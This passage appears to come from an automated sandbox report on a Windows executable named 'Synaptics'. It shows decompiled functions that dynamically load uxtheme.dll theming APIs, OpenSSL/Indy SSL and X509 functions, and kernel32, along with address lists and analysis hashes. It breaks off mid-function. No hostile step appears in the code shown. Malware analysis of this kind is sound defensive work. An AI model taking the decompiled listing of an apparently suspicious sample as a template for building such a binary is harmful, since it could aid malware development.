						 *0x49e9b8 = GetProcAddress( *0x49ea40, "IsThemeBackgroundPartiallyTransparent");
						 *0x49e9bc = GetProcAddress( *0x49ea40, "GetThemeColor");
						 *0x49e9c0 = GetProcAddress( *0x49ea40, "GetThemeMetric");
						 *0x49e9c4 = GetProcAddress( *0x49ea40, "GetThemeString");
						 *0x49e9c8 = GetProcAddress( *0x49ea40, "GetThemeBool");
						 *0x49e9cc = GetProcAddress( *0x49ea40, "GetThemeInt");
						 *0x49e9d0 = GetProcAddress( *0x49ea40, "GetThemeEnumValue");
						 *0x49e9d4 = GetProcAddress( *0x49ea40, "GetThemePosition");
						 *0x49e9d8 = GetProcAddress( *0x49ea40, "GetThemeFont");
						 *0x49e9dc = GetProcAddress( *0x49ea40, "GetThemeRect");
						 *0x49e9e0 = GetProcAddress( *0x49ea40, "GetThemeMargins");
						 *0x49e9e4 = GetProcAddress( *0x49ea40, "GetThemeIntList");
						 *0x49e9e8 = GetProcAddress( *0x49ea40, "GetThemePropertyOrigin");
						 *0x49e9ec = GetProcAddress( *0x49ea40, "SetWindowTheme");
						 *0x49e9f0 = GetProcAddress( *0x49ea40, "GetThemeFilename");
						 *0x49e9f4 = GetProcAddress( *0x49ea40, "GetThemeSysColor");
						 *0x49e9f8 = GetProcAddress( *0x49ea40, "GetThemeSysColorBrush");
						 *0x49e9fc = GetProcAddress( *0x49ea40, "GetThemeSysBool");
						 *0x49ea00 = GetProcAddress( *0x49ea40, "GetThemeSysSize");
						 *0x49ea04 = GetProcAddress( *0x49ea40, "GetThemeSysFont");
						 *0x49ea08 = GetProcAddress( *0x49ea40, "GetThemeSysString");
						 *0x49ea0c = GetProcAddress( *0x49ea40, "GetThemeSysInt");
						 *0x49ea10 = GetProcAddress( *0x49ea40, "IsThemeActive");
						 *0x49ea14 = GetProcAddress( *0x49ea40, "IsAppThemed");
						 *0x49ea18 = GetProcAddress( *0x49ea40, "GetWindowTheme");
						 *0x49ea1c = GetProcAddress( *0x49ea40, "EnableThemeDialogTexture");
						 *0x49ea20 = GetProcAddress( *0x49ea40, "IsThemeDialogTextureEnabled");
						 *0x49ea24 = GetProcAddress( *0x49ea40, "GetThemeAppProperties");
						 *0x49ea28 = GetProcAddress( *0x49ea40, "SetThemeAppProperties");
						 *0x49ea2c = GetProcAddress( *0x49ea40, "GetCurrentThemeName");
						 *0x49ea30 = GetProcAddress( *0x49ea40, "GetThemeDocumentationProperty");
						 *0x49ea34 = GetProcAddress( *0x49ea40, "DrawThemeParentBackground");
						 *0x49ea38 = GetProcAddress( *0x49ea40, "EnableTheming");
					}
				}
				_v5 =  *0x49ea40 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x42e76e);
				_t6 =  *0x49ea48; // 0x21e0dc8
				return E0042E1B4(_t6);
			}








                                                                                                                                                                                                                            0x0042e3be
                                                                                                                                                                                                                            0x0042e3c3
                                                                                                                                                                                                                            0x0042e3ca
                                                                                                                                                                                                                            0x0042e3cb
                                                                                                                                                                                                                            0x0042e3d0
                                                                                                                                                                                                                            0x0042e3d3
                                                                                                                                                                                                                            0x0042e3d6
                                                                                                                                                                                                                            0x0042e3df
                                                                                                                                                                                                                            0x0042e3ef
                                                                                                                                                                                                                            0x0042e3f4
                                                                                                                                                                                                                            0x0042e407
                                                                                                                                                                                                                            0x0042e419
                                                                                                                                                                                                                            0x0042e42b
                                                                                                                                                                                                                            0x0042e43d
                                                                                                                                                                                                                            0x0042e44f
                                                                                                                                                                                                                            0x0042e461
                                                                                                                                                                                                                            0x0042e473
                                                                                                                                                                                                                            0x0042e485
                                                                                                                                                                                                                            0x0042e497
                                                                                                                                                                                                                            0x0042e4a9
                                                                                                                                                                                                                            0x0042e4bb
                                                                                                                                                                                                                            0x0042e4cd
                                                                                                                                                                                                                            0x0042e4df
                                                                                                                                                                                                                            0x0042e4f1
                                                                                                                                                                                                                            0x0042e503
                                                                                                                                                                                                                            0x0042e515
                                                                                                                                                                                                                            0x0042e527
                                                                                                                                                                                                                            0x0042e539
                                                                                                                                                                                                                            0x0042e54b
                                                                                                                                                                                                                            0x0042e55d
                                                                                                                                                                                                                            0x0042e56f
                                                                                                                                                                                                                            0x0042e581
                                                                                                                                                                                                                            0x0042e593
                                                                                                                                                                                                                            0x0042e5a5
                                                                                                                                                                                                                            0x0042e5b7
                                                                                                                                                                                                                            0x0042e5c9
                                                                                                                                                                                                                            0x0042e5db
                                                                                                                                                                                                                            0x0042e5ed
                                                                                                                                                                                                                            0x0042e5ff
                                                                                                                                                                                                                            0x0042e611
                                                                                                                                                                                                                            0x0042e623
                                                                                                                                                                                                                            0x0042e635
                                                                                                                                                                                                                            0x0042e647
                                                                                                                                                                                                                            0x0042e659
                                                                                                                                                                                                                            0x0042e66b
                                                                                                                                                                                                                            0x0042e67d
                                                                                                                                                                                                                            0x0042e68f
                                                                                                                                                                                                                            0x0042e6a1
                                                                                                                                                                                                                            0x0042e6b3
                                                                                                                                                                                                                            0x0042e6c5
                                                                                                                                                                                                                            0x0042e6d7
                                                                                                                                                                                                                            0x0042e6e9
                                                                                                                                                                                                                            0x0042e6fb
                                                                                                                                                                                                                            0x0042e70d
                                                                                                                                                                                                                            0x0042e71f
                                                                                                                                                                                                                            0x0042e731
                                                                                                                                                                                                                            0x0042e743
                                                                                                                                                                                                                            0x0042e743
                                                                                                                                                                                                                            0x0042e3f4
                                                                                                                                                                                                                            0x0042e74b
                                                                                                                                                                                                                            0x0042e751
                                                                                                                                                                                                                            0x0042e754
                                                                                                                                                                                                                            0x0042e757
                                                                                                                                                                                                                            0x0042e75c
                                                                                                                                                                                                                            0x0042e766

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0042E767), ref: 0042E3EA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0042E402
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0042E414
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042E426
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042E438
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E44A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E45C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0042E46E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0042E480
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0042E492
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0042E4A4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042E4B6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042E4C8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042E4DA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042E4EC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042E4FE
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0042E510
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0042E522
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0042E534
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042E546
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0042E558
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0042E56A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0042E57C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042E58E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0042E5A0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0042E5B2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0042E5C4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042E5D6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042E5E8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042E5FA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042E60C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042E61E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0042E630
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0042E642
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0042E654
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0042E666
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0042E678
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042E68A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042E69C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042E6AE
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0042E6C0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0042E6D2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0042E6E4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042E6F6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042E708
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042E71A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0042E72C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0042E73E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                                                                                                            • API String ID: 2238633743-2910565190
                                                                                                                                                                                                                            • Opcode ID: 8d86ba1094030d790a56e86b91411d8c7853f90e04823d3f43234c390784be56
                                                                                                                                                                                                                            • Instruction ID: 583b1748ec7c75dcc55376f1719c3b0464f23e6b29e7b95583f9f44409200d59
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d86ba1094030d790a56e86b91411d8c7853f90e04823d3f43234c390784be56
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08A1F2B0F48660AFDB00EB67EC96B2637A8EB15704350467BB400DF696D67DA8009B5E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004906B8 Relevance: 142.1, APIs: 2, Strings: 79, Instructions: 395libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004906B8() {
				void* __ebx;
				void* _t158;

				_t158 = 1;
				if( *0x49d588 == 0) {
					 *0x49d588 = LoadLibraryA("libeay32.dll");
				}
				_t160 =  *0x49d584;
				if( *0x49d584 == 0) {
					 *0x49d584 = LoadLibraryA("ssleay32.dll");
					 *0x49d454 = E0049058C("SSL_CTX_set_cipher_list", _t158);
					 *0x49d458 = E0049058C("SSL_CTX_new", _t158);
					 *0x49d45c = E0049058C("SSL_CTX_free", _t158);
					 *0x49d460 = E0049058C("SSL_set_fd", _t158);
					 *0x49d464 = E0049058C("SSL_CTX_use_PrivateKey_file", _t158);
					 *0x49d468 = E0049058C("SSL_CTX_use_certificate_file", _t158);
					 *0x49d46c = E0049058C("SSL_load_error_strings", _t158);
					 *0x49d470 = E0049058C("SSL_state_string_long", _t158);
					 *0x49d474 = E0049058C("SSL_get_peer_certificate", _t158);
					 *0x49d478 = E0049058C("SSL_CTX_set_verify", _t158);
					 *0x49d47c = E0049058C("SSL_CTX_set_verify_depth", _t158);
					 *0x49d480 = E0049058C("SSL_CTX_get_verify_depth", _t158);
					 *0x49d484 = E0049058C("SSL_CTX_set_default_passwd_cb", _t158);
					 *0x49d488 = E0049058C("SSL_CTX_set_default_passwd_cb_userdata", _t158);
					 *0x49d48c = E0049058C("SSL_CTX_check_private_key", _t158);
					 *0x49d490 = E0049058C("SSL_new", _t158);
					 *0x49d494 = E0049058C("SSL_free", _t158);
					 *0x49d498 = E0049058C("SSL_accept", _t158);
					 *0x49d49c = E0049058C("SSL_connect", _t158);
					 *0x49d4a0 = E0049058C("SSL_read", _t158);
					 *0x49d4a4 = E0049058C("SSL_peek", _t158);
					 *0x49d4a8 = E0049058C("SSL_write", _t158);
					 *0x49d4ac = E0049058C("SSL_get_error", _t158);
					 *0x49d4b0 = E0049058C("SSLv2_method", _t158);
					 *0x49d4b4 = E0049058C("SSLv2_server_method", _t158);
					 *0x49d4b8 = E0049058C("SSLv2_client_method", _t158);
					 *0x49d4bc = E0049058C("SSLv3_method", _t158);
					 *0x49d4c0 = E0049058C("SSLv3_server_method", _t158);
					 *0x49d4c4 = E0049058C("SSLv3_client_method", _t158);
					 *0x49d4c8 = E0049058C("SSLv23_method", _t158);
					 *0x49d4cc = E0049058C("SSLv23_server_method", _t158);
					 *0x49d4d0 = E0049058C("SSLv23_client_method", _t158);
					 *0x49d4d4 = E0049058C("TLSv1_method", _t158);
					 *0x49d4d8 = E0049058C("TLSv1_server_method", _t158);
					 *0x49d4dc = E0049058C("TLSv1_client_method", _t158);
					 *0x49d4e0 = E0049058C("SSL_shutdown", _t158);
					 *0x49d4e4 = E0049058C("SSL_set_connect_state", _t158);
					 *0x49d4e8 = E0049058C("SSL_set_accept_state", _t158);
					 *0x49d4ec = E0049058C("SSL_set_shutdown", _t158);
					 *0x49d4f0 = E0049058C("SSL_CTX_load_verify_locations", _t158);
					 *0x49d4f4 = E0049058C("SSL_get_session", _t158);
					 *0x49d4f8 = E0049058C("SSL_library_init", _t158);
					 *0x49d4fc = E004905FC("SSL_CTX_set_info_callback_indy", _t158, _t160);
					 *0x49d500 = E004905FC("X509_STORE_CTX_get_app_data_indy", _t158, _t160);
					 *0x49d504 = E004905FC("SSL_SESSION_get_id_indy", _t158, _t160);
					 *0x49d508 = E004905FC("SSL_SESSION_get_id_ctx_indy", _t158, _t160);
					 *0x49d50c = E004905FC("SSL_CTX_get_version_indy", _t158, _t160);
					 *0x49d510 = E004905FC("SSL_CTX_set_options_indy", _t158, _t160);
					 *0x49d514 = E00490648("X509_NAME_oneline", _t158);
					 *0x49d518 = E0049058C("X509_NAME_hash", _t158);
					 *0x49d51c = E00490648("X509_set_issuer_name", _t158);
					 *0x49d520 = E00490648("X509_get_issuer_name", _t158);
					 *0x49d524 = E00490648("X509_set_subject_name", _t158);
					 *0x49d528 = E00490648("X509_get_subject_name", _t158);
					 *0x49d52c = E0049058C("X509_digest", _t158);
					 *0x49d530 = E0049058C("EVP_md5", _t158);
					 *0x49d534 = E004905FC("X509_get_notBefore_indy", _t158, _t160);
					 *0x49d538 = E004905FC("X509_get_notAfter_indy", _t158, _t160);
					 *0x49d53c = E00490648("X509_STORE_CTX_get_error", _t158);
					 *0x49d540 = E00490648("X509_STORE_CTX_set_error", _t158);
					 *0x49d544 = E00490648("X509_STORE_CTX_get_error_depth", _t158);
					 *0x49d548 = E00490648("X509_STORE_CTX_get_current_cert", _t158);
					 *0x49d590 = E00490648("RAND_screen", _t158);
					 *0x49d54c = E00490648("des_set_odd_parity", _t158);
					 *0x49d550 = E00490648("des_set_key", _t158);
					 *0x49d554 = E00490648("des_ecb_encrypt", _t158);
					 *0x49d558 = E0049058C("SSL_set_ex_data", _t158);
					 *0x49d55c = E0049058C("SSL_get_ex_data", _t158);
					 *0x49d560 = E0049058C("SSL_load_client_CA_file", _t158);
					 *0x49d564 = E0049058C("SSL_CTX_set_client_CA_list", _t158);
					 *0x49d568 = E0049058C("SSL_CTX_set_default_verify_paths", _t158);
					 *0x49d56c = E0049058C("SSL_CTX_set_session_id_context", _t158);
					 *0x49d570 = E0049058C("SSL_CIPHER_description", _t158);
					 *0x49d574 = E0049058C("SSL_get_current_cipher", _t158);
					 *0x49d578 = E0049058C("SSL_CIPHER_get_name", _t158);
					 *0x49d57c = E0049058C("SSL_CIPHER_get_version", _t158);
					 *0x49d580 = E0049058C("SSL_CIPHER_get_bits", _t158);
					if( *0x49d454 == 0 ||  *0x49d458 == 0 ||  *0x49d45c == 0 ||  *0x49d460 == 0 ||  *0x49d464 == 0 ||  *0x49d468 == 0 ||  *0x49d46c == 0 ||  *0x49d470 == 0 ||  *0x49d474 == 0 ||  *0x49d478 == 0 ||  *0x49d484 == 0 ||  *0x49d488 == 0 ||  *0x49d48c == 0 ||  *0x49d490 == 0 ||  *0x49d494 == 0 ||  *0x49d498 == 0 ||  *0x49d49c == 0 ||  *0x49d4a0 == 0 ||  *0x49d4a4 == 0 ||  *0x49d4a8 == 0 ||  *0x49d4ac == 0 ||  *0x49d4b0 == 0 ||  *0x49d4b4 == 0 ||  *0x49d4b8 == 0 ||  *0x49d4bc == 0 ||  *0x49d4c0 == 0 ||  *0x49d4c4 == 0 ||  *0x49d4c8 == 0 ||  *0x49d4cc == 0 ||  *0x49d4d0 == 0 ||  *0x49d4d4 == 0 ||  *0x49d4d8 == 0 ||  *0x49d4dc == 0 ||  *0x49d4e0 == 0 ||  *0x49d4e4 == 0 ||  *0x49d4e8 == 0 ||  *0x49d4ec == 0 ||  *0x49d4f0 == 0 ||  *0x49d4f4 == 0 ||  *0x49d4f8 == 0 ||  *0x49d4fc == 0 ||  *0x49d500 == 0 ||  *0x49d504 == 0 ||  *0x49d508 == 0 ||  *0x49d50c == 0 ||  *0x49d510 == 0 ||  *0x49d514 == 0 ||  *0x49d51c == 0 ||  *0x49d520 == 0 ||  *0x49d524 == 0 ||  *0x49d528 == 0 ||  *0x49d534 == 0 ||  *0x49d538 == 0 ||  *0x49d53c == 0 ||  *0x49d540 == 0 ||  *0x49d544 == 0 ||  *0x49d548 == 0 ||  *0x49d54c == 0 ||  *0x49d550 == 0 ||  *0x49d554 == 0 ||  *0x49d558 == 0 ||  *0x49d55c == 0 ||  *0x49d47c == 0 ||  *0x49d480 == 0 ||  *0x49d560 == 0 ||  *0x49d564 == 0 ||  *0x49d568 == 0 ||  *0x49d56c == 0 ||  *0x49d570 == 0 ||  *0x49d574 == 0 ||  *0x49d578 == 0 ||  *0x49d580 == 0 ||  *0x49d57c == 0) {
						_t158 = 0;
					} else {
						_t158 = 1;
					}
				}
				return _t158;
			}





                                                                                                                                                                                                                            0x004906b9
                                                                                                                                                                                                                            0x004906c2
                                                                                                                                                                                                                            0x004906ce
                                                                                                                                                                                                                            0x004906ce
                                                                                                                                                                                                                            0x004906d3
                                                                                                                                                                                                                            0x004906da
                                                                                                                                                                                                                            0x004906ea
                                                                                                                                                                                                                            0x004906f9
                                                                                                                                                                                                                            0x00490708
                                                                                                                                                                                                                            0x00490717
                                                                                                                                                                                                                            0x00490726
                                                                                                                                                                                                                            0x00490735
                                                                                                                                                                                                                            0x00490744
                                                                                                                                                                                                                            0x00490753
                                                                                                                                                                                                                            0x00490762
                                                                                                                                                                                                                            0x00490771
                                                                                                                                                                                                                            0x00490780
                                                                                                                                                                                                                            0x0049078f
                                                                                                                                                                                                                            0x0049079e
                                                                                                                                                                                                                            0x004907ad
                                                                                                                                                                                                                            0x004907bc
                                                                                                                                                                                                                            0x004907cb
                                                                                                                                                                                                                            0x004907da
                                                                                                                                                                                                                            0x004907e9
                                                                                                                                                                                                                            0x004907f8
                                                                                                                                                                                                                            0x00490807
                                                                                                                                                                                                                            0x00490816
                                                                                                                                                                                                                            0x00490825
                                                                                                                                                                                                                            0x00490834
                                                                                                                                                                                                                            0x00490843
                                                                                                                                                                                                                            0x00490852
                                                                                                                                                                                                                            0x00490861
                                                                                                                                                                                                                            0x00490870
                                                                                                                                                                                                                            0x0049087f
                                                                                                                                                                                                                            0x0049088e
                                                                                                                                                                                                                            0x0049089d
                                                                                                                                                                                                                            0x004908ac
                                                                                                                                                                                                                            0x004908bb
                                                                                                                                                                                                                            0x004908ca
                                                                                                                                                                                                                            0x004908d9
                                                                                                                                                                                                                            0x004908e8
                                                                                                                                                                                                                            0x004908f7
                                                                                                                                                                                                                            0x00490906
                                                                                                                                                                                                                            0x00490915
                                                                                                                                                                                                                            0x00490924
                                                                                                                                                                                                                            0x00490933
                                                                                                                                                                                                                            0x00490942
                                                                                                                                                                                                                            0x00490951
                                                                                                                                                                                                                            0x00490960
                                                                                                                                                                                                                            0x0049096f
                                                                                                                                                                                                                            0x0049097e
                                                                                                                                                                                                                            0x0049098d
                                                                                                                                                                                                                            0x0049099c
                                                                                                                                                                                                                            0x004909ab
                                                                                                                                                                                                                            0x004909ba
                                                                                                                                                                                                                            0x004909c9
                                                                                                                                                                                                                            0x004909d8
                                                                                                                                                                                                                            0x004909e7
                                                                                                                                                                                                                            0x004909f6
                                                                                                                                                                                                                            0x00490a05
                                                                                                                                                                                                                            0x00490a14
                                                                                                                                                                                                                            0x00490a23
                                                                                                                                                                                                                            0x00490a32
                                                                                                                                                                                                                            0x00490a41
                                                                                                                                                                                                                            0x00490a50
                                                                                                                                                                                                                            0x00490a5f
                                                                                                                                                                                                                            0x00490a6e
                                                                                                                                                                                                                            0x00490a7d
                                                                                                                                                                                                                            0x00490a8c
                                                                                                                                                                                                                            0x00490a9b
                                                                                                                                                                                                                            0x00490aaa
                                                                                                                                                                                                                            0x00490ab9
                                                                                                                                                                                                                            0x00490ac8
                                                                                                                                                                                                                            0x00490ad7
                                                                                                                                                                                                                            0x00490ae6
                                                                                                                                                                                                                            0x00490af5
                                                                                                                                                                                                                            0x00490b04
                                                                                                                                                                                                                            0x00490b13
                                                                                                                                                                                                                            0x00490b22
                                                                                                                                                                                                                            0x00490b31
                                                                                                                                                                                                                            0x00490b40
                                                                                                                                                                                                                            0x00490b4f
                                                                                                                                                                                                                            0x00490b5e
                                                                                                                                                                                                                            0x00490b6d
                                                                                                                                                                                                                            0x00490b79
                                                                                                                                                                                                                            0x00490eeb
                                                                                                                                                                                                                            0x00490eef
                                                                                                                                                                                                                            0x00490eef
                                                                                                                                                                                                                            0x00490eef
                                                                                                                                                                                                                            0x00490b79
                                                                                                                                                                                                                            0x00490ef4

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(libeay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906C9
                                                                                                                                                                                                                              • Part of subcall function 0049058C: GetProcAddress.KERNEL32(00000000,00000000), ref: 004905C6
                                                                                                                                                                                                                              • Part of subcall function 00490648: GetProcAddress.KERNEL32(00000000,00000000), ref: 00490682
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ssleay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906E5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                            • String ID: EVP_md5$RAND_screen$SSL_CIPHER_description$SSL_CIPHER_get_bits$SSL_CIPHER_get_name$SSL_CIPHER_get_version$SSL_CTX_check_private_key$SSL_CTX_free$SSL_CTX_get_verify_depth$SSL_CTX_get_version_indy$SSL_CTX_load_verify_locations$SSL_CTX_new$SSL_CTX_set_cipher_list$SSL_CTX_set_client_CA_list$SSL_CTX_set_default_passwd_cb$SSL_CTX_set_default_passwd_cb_userdata$SSL_CTX_set_default_verify_paths$SSL_CTX_set_info_callback_indy$SSL_CTX_set_options_indy$SSL_CTX_set_session_id_context$SSL_CTX_set_verify$SSL_CTX_set_verify_depth$SSL_CTX_use_PrivateKey_file$SSL_CTX_use_certificate_file$SSL_SESSION_get_id_ctx_indy$SSL_SESSION_get_id_indy$SSL_accept$SSL_connect$SSL_free$SSL_get_current_cipher$SSL_get_error$SSL_get_ex_data$SSL_get_peer_certificate$SSL_get_session$SSL_library_init$SSL_load_client_CA_file$SSL_load_error_strings$SSL_new$SSL_peek$SSL_read$SSL_set_accept_state$SSL_set_connect_state$SSL_set_ex_data$SSL_set_fd$SSL_set_shutdown$SSL_shutdown$SSL_state_string_long$SSL_write$SSLv23_client_method$SSLv23_method$SSLv23_server_method$SSLv2_client_method$SSLv2_method$SSLv2_server_method$SSLv3_client_method$SSLv3_method$SSLv3_server_method$TLSv1_client_method$TLSv1_method$TLSv1_server_method$X509_NAME_hash$X509_NAME_oneline$X509_STORE_CTX_get_app_data_indy$X509_STORE_CTX_get_current_cert$X509_STORE_CTX_get_error$X509_STORE_CTX_get_error_depth$X509_STORE_CTX_set_error$X509_digest$X509_get_issuer_name$X509_get_notAfter_indy$X509_get_notBefore_indy$X509_get_subject_name$X509_set_issuer_name$X509_set_subject_name$des_ecb_encrypt$des_set_key$des_set_odd_parity$libeay32.dll$ssleay32.dll
                                                                                                                                                                                                                            • API String ID: 2574300362-3914122982
                                                                                                                                                                                                                            • Opcode ID: 31a3a092b2a30d0d7f1c1506beb22041e5308534041b8679323eb52cb0d8e883
                                                                                                                                                                                                                            • Instruction ID: 3fc9e01923c26730d663d19a2b901ff2da1ed37202cb3e817e08d019f5698bc5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31a3a092b2a30d0d7f1c1506beb22041e5308534041b8679323eb52cb0d8e883
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9202C874D00205AEDF75EB6DA90935A3EA1E76432DF06443BA908C72B1D77C9884CF9E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004728A4 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004728A4() {

				if( *0x49ebf4 == 0) {
					 *0x49ebf4 = GetModuleHandleA("kernel32.dll");
					if( *0x49ebf4 != 0) {
